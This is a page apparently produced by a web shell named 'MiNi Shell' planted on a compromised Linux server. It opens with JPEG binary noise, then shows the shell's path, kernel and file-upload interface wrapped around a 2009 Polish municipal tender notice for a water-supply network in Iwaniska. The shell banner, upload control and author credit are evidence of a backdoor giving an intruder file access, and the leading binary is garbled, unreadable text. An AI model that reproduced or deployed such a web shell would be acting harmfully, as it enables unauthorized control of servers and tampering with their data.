JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/56713-N-2009.html

<p class="kh_header"><b>Iwaniska: Budowa sieci wodociągowej w miejscowościach Gminy Iwaniska - Kamieniec, Kujawy, Gryzikamień, Łopatno, Marianów, Wygiełzów, Zagrody, Młynki - I Etap.</b><br>
<b>Numer ogłoszenia: 56713 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwaniska , ul. Rynek 3, 28-570 Iwaniska, woj. świętokrzyskie, tel. 015 8601254, faks 015 8601240.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej w miejscowościach Gminy Iwaniska - Kamieniec, Kujawy, Gryzikamień, Łopatno, Marianów, Wygiełzów, Zagrody, Młynki - I Etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa sieci wodociągowej w miejscowościach Gminy Iwaniska - Kamieniec, Kujawy, Gryzikamień, Łopatno, Marianów, Wygiełzów, Zagrody, Młynki - I Etap,      o długości 28834 mb oraz budowa hydroforni (pompowni) z zasilaniem energetycznym i zbiornikiem wody o pojemności 2x 100 m3 zlokalizowanej w miejscowości Gryzikamień..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.13.00-8, 45.23.21.50-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 190.000,00 zł (słownie złotych: sto   dziewięćdziesiąt tysięcy 00/100
Wadium musi obejmować okres związania ofertą, tj. do dnia 22.05.2009 r.
Termin wniesienia wadium upływa dnia 21-04-2009 r.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2)	posiadają niezbędna wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Kwota i termin wniesienia wadium
Oferta musi być zabezpieczona wadium w wysokości: 190.000,00 zł (słownie złotych: sto   dziewięćdziesiąt tysięcy 00/100
Wadium musi obejmować okres związania ofertą, tj. do dnia 22.05.2009 r.
Termin wniesienia wadium upływa dnia 21-04-2009 r.
10.  Formy i miejsce wnoszenia wadium
Wadium może być wnoszone w jednej lub kilku następujących formach:
 -	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,  
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego: Bank Spółdzielczy w  Staszowie O/Iwaniska, numer konta:
70 9431 1015 2003 0300  2020 0002

W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się datę wpływu wadium na rachunek bankowy Zamawiającego.

Potwierdzenie wniesienia wadium w formie pieniężnej należy dołączyć do oferty. 
W przypadku złożenia wadium w formie poręczenia, gwarancji bankowej lub gwarancji ubezpieczeniowej należy załączyć oryginał dokumentu gwarancyjnego do oferty. 

Zamawiający zwróci niezwłocznie wadium Wykonawcy, jeżeli:
-	upłynął  termin związania ofertą,
-	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy,
-	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy: 
-	który wycofał ofertę przed upływem terminu składania ofert,,
-	którego oferta została odrzucona.

Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
-	jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału               w postępowaniu, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
   
    Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:

  1)   Wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie     
        publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych,
 2)    Wykonawców, którzy wykonywali czynności związane z przygotowaniem prowadzonego 
        postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi  
        w  dokonywaniu tych czynności,
 3)    Wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik
        prowadzonego postępowania,
 4)    Wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału
        w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków,	
 5)    Wykonawców, którzy nie wnieśli wadium, w tym również na przedłużony okres związania 
        ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.


Zamawiający odrzuca ofertę, która:

1)	jest niezgodna z ustawą,
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
 3)   jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu  
       nieuczciwej konkurencji,
 4)   zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
 5)   została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
       zamówienia lub nie zaproszonego do składania ofert,
 6)   zawiera błędy w obliczeniu ceny,
 7)   wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na
       poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, 
 8)   jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:

1. Dokumenty wymagane:
1)   formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2,
2)   aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
      zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 
      przed upływem terminu składania ofert,
3)   dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają  
      z  przepisów prawa lub innych dokumentów rejestrowych,
5)   aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie
      właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
      określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed 
      upływem terminu składania ofert,
6)   aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
      pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
7)   aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego  
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
      Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
      podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub
      zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na
      raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - 
      wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
8)   dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają 
      uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
9)   oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 - ustawy Prawo
      zamówień publicznych z wykorzystaniem wzoru - załącznik nr 4,
10) oświadczenie o spełnianiu warunków określonych w art. 24 ust. 1 i 2 - ustawy Prawo
      zamówień publicznych z wykorzystaniem wzoru - załącznik nr 4,
11) oświadczenie o zapoznaniu się z dokumentami opracowanymi dla zadania pod nazwą:  

Budowa sieci wodociągowej w miejscowościach Gminy Iwaniska - Kamieniec, Kujawy, Gryzikamień, Łopatno, Marianów, Wygiełzów, Zagrody, Młynki - I Etap.

      ze specyfikacją istotnych warunków zamówienia, z dokumentacją projektową,           
       z   przedmiarami robót, ze specyfikacją techniczną wykonania i odbioru robót budowlanych 
      oraz terenem, na którym będzie realizowane w/w zadania - załącznik nr 5,
11)  szczegółowy kosztorys ofertowy,
12)  parafowany na każdej stronie wzór umowy  - załącznik nr 3,

Dokumenty dodatkowe 
1.   Oświadczenie o zastrzeżeniu tajności informacji stanowiących tajemnicę przedsiębiorstwa 
      (jeśli jest taka potrzebna).
     Informacje zawarte w ofercie, stanowiące tajemnicę przedsiębiorstwa w rozumieniu 
     przepisów ustawy o zwalczaniu nieuczciwej konkurencji, co do których Wykonawca 
     zastrzegł, nie później niż w terminie składania ofert, że nie mogą być udostępnione, 
     muszą być oznaczone klauzulą: NIE UDOSTĘPNIAĆ - INFORMACJE STANOWIĄ 
     TAJEMNICĘ PRZEDSIEBIORSTWA W ROZUMIENIU ART. 11 UST. 4 USTAWY 
     O ZWALCZANIU NIEUCZCIWEJ KONKURENCJI (tekst jednolity Dz.U. z 2003 r. nr 153 
      poz. 1503 ze zm.) i załączone jako odrębna część niezłączona z ofertą w sposób trwały.

W przypadku załączenia do oferty innych materiałów niż wymagane przez Zamawiającego (np. materiałów reklamowych, informacyjnych) pożądane jest, aby stanowiły one odrębną część niezłączoną z ofertą w sposób trwały.

2. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)   nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2)   nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3)   nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub  
      zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
 raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

3. Dokumenty wymagane w przypadku składania oferty wspólnej

1)  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
    ustanowionego  pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania 
    w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
2) Oferta winna zawierać  oświadczenia i dokumenty  opisane w pkt. 1  dla każdego partnera  
     z osobna, pozostałe dokumenty składane są wspólnie. 

4. Inne dokumenty:
4.1.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie,
      potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia,   
      wykonawca składa następujące dokumenty:
a)   informację na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności  
     personelu kierowniczego, w okresie ostatnich trzech lat, w przypadku, gdy okres 
     prowadzenia działalności jest krótszy - w tym okresie, jeżeli przedmiotem zamówienia są 
     roboty budowlane lub usługi,
b)  wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje  
     wykonawca lub będzie dysponował wykonawca - załącznik nr 6,
     jeżeli w wykazie, o którym mowa wyżej wykonawca wskazał narzędzia i urządzenia, 
     którymi będzie dysponował, należy załączyć pisemne zobowiązania innych podmiotów 
     do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, 
c)  wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć 
     w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
     doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu 
     wykonywanych przez nich czynności - załącznik nr 7,
     jeżeli w wykazie, o którym mowa wyżej wykonawca wskazał osoby, 
     którymi będzie dysponował, należy załączyć pisemne zobowiązania innych podmiotów 
     do udostępnienia osób zdolnych do wykonania zamówienia,
d)  wykaz wykonanych w okresie ostatnich 5 lat robót budowlanych, a jeżeli okres 
     prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem
     i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, z podaniem ich 
     wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że 
     roboty te zostały wykonane należycie (protokół odbioru robót - kserokopia potwierdzona 
     z oryginałem) - załącznik nr 8,
e) oświadczenie o podjęciu obowiązków kierownika budowy - załącznik nr 9.

4.2. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
       zapewniającej wykonanie zamówienia, składa następujące dokumenty:

a)   informacja banku, w którym wykonawca posiada podstawowy rachunek bankowy, czy 
      posiada środki finansowe na sfinansowanie przedsięwzięcia  o wartości złożonej  oferty,  
      wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

b)  polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od 
     odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę / osoby uprawnioną do podpisania oferty z dopiskiem   -za zgodność z oryginałem.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania zamówienia - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http:// iwaniska.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Iwaniska
ul. Rynek  3, pokój nr 3.
27-570	Iwaniska
http:// iwaniska.pl/bip.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 10:00, miejsce: Urząd Gminy Iwaniska
ul. Rynek  3, sekretariat -pokój nr 4
27-570	Iwaniska.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 22.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com